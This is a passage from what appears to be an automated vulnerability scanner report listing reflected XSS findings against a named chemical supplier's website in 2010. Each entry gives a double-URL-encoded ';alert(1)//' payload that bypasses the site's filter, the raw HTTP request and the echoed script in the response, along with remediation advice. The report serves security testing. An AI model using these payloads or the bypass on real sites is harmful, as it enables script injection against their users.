       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core/validation.js6f83e";alert(1)//6b129e705e5","E404") ;
   </script>
...[SNIP]...

1.515. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/effects.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ade5%2522%253balert%25281%2529%252f%252f22b1f9faaf0 was submitted in the REST URL parameter 1. This input was echoed as 4ade5";alert(1)//22b1f9faaf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js4ade5%2522%253balert%25281%2529%252f%252f22b1f9faaf0/effects.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=2e94d126-e84a-5442-8236-015d6ded3e9e;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js4ade5";alert(1)//22b1f9faaf0/effects.js","E404") ;
   </script>
...[SNIP]...

1.516. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/effects.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c80c%2522%253balert%25281%2529%252f%252fe22f4f15946 was submitted in the REST URL parameter 2. This input was echoed as 1c80c";alert(1)//e22f4f15946 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/effects.js1c80c%2522%253balert%25281%2529%252f%252fe22f4f15946 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=fba874d7-ffe0-f248-88e2-bf4063cea3f4;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/effects.js1c80c";alert(1)//e22f4f15946","E404") ;
   </script>
...[SNIP]...

1.517. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/globallinks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926ac%2522%253balert%25281%2529%252f%252f7b2eb5a00c3 was submitted in the REST URL parameter 1. This input was echoed as 926ac";alert(1)//7b2eb5a00c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js926ac%2522%253balert%25281%2529%252f%252f7b2eb5a00c3/globallinks.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js926ac";alert(1)//7b2eb5a00c3/globallinks.js","E404") ;
   </script>
...[SNIP]...

1.518. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/globallinks.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92926%2522%253balert%25281%2529%252f%252fb2862eae390 was submitted in the REST URL parameter 2. This input was echoed as 92926";alert(1)//b2862eae390 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/globallinks.js92926%2522%253balert%25281%2529%252f%252fb2862eae390 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/globallinks.js92926";alert(1)//b2862eae390","E404") ;
   </script>
...[SNIP]...

1.519. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/homenav.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b239%2522%253balert%25281%2529%252f%252ff177d83d83c was submitted in the REST URL parameter 1. This input was echoed as 7b239";alert(1)//f177d83d83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js7b239%2522%253balert%25281%2529%252f%252ff177d83d83c/homenav.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js7b239";alert(1)//f177d83d83c/homenav.js","E404") ;
   </script>
...[SNIP]...

1.520. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/homenav.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ccef%2522%253balert%25281%2529%252f%252f8c9f1c754a2 was submitted in the REST URL parameter 2. This input was echoed as 2ccef";alert(1)//8c9f1c754a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/homenav.js2ccef%2522%253balert%25281%2529%252f%252f8c9f1c754a2 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28917


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/homenav.js2ccef";alert(1)//8c9f1c754a2","E404") ;
   </script>
...[SNIP]...

1.521. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/jquery-min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a18%2522%253balert%25281%2529%252f%252f552af26323c was submitted in the REST URL parameter 1. This input was echoed as 66a18";alert(1)//552af26323c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js66a18%2522%253balert%25281%2529%252f%252f552af26323c/jquery-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28920


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js66a18";alert(1)//552af26323c/jquery-min.js","E404") ;
   </script>
...[SNIP]...

1.522. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/jquery-min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57259%2522%253balert%25281%2529%252f%252f6f790981f86 was submitted in the REST URL parameter 2. This input was echoed as 57259";alert(1)//6f790981f86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jquery-min.js57259%2522%253balert%25281%2529%252f%252f6f790981f86 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28920


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/jquery-min.js57259";alert(1)//6f790981f86","E404") ;
   </script>
...[SNIP]...

1.523. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/prototype.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 807e4%2522%253balert%25281%2529%252f%252fb5706bee04 was submitted in the REST URL parameter 1. This input was echoed as 807e4";alert(1)//b5706bee04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js807e4%2522%253balert%25281%2529%252f%252fb5706bee04/prototype.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=6d5a5005-61b1-d449-89fd-19f4ff61911c;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js807e4";alert(1)//b5706bee04/prototype.js","E404") ;
   </script>
...[SNIP]...

1.524. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/prototype.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6264a%2522%253balert%25281%2529%252f%252f3de03120ff4 was submitted in the REST URL parameter 2. This input was echoed as 6264a";alert(1)//3de03120ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/prototype.js6264a%2522%253balert%25281%2529%252f%252f3de03120ff4 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=0e1edbac-bc86-6c47-87e7-d9c98ff76a57;Path=/
Content-Length: 28919


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/prototype.js6264a";alert(1)//3de03120ff4","E404") ;
   </script>
...[SNIP]...

1.525. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/scriptaculous.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b4c1%2522%253balert%25281%2529%252f%252f06cb2ec88d6 was submitted in the REST URL parameter 1. This input was echoed as 3b4c1";alert(1)//06cb2ec88d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js3b4c1%2522%253balert%25281%2529%252f%252f06cb2ec88d6/scriptaculous.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=e98ceaf5-3b8a-fc49-890e-4a0af9bd280c;Path=/
Content-Length: 28923


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
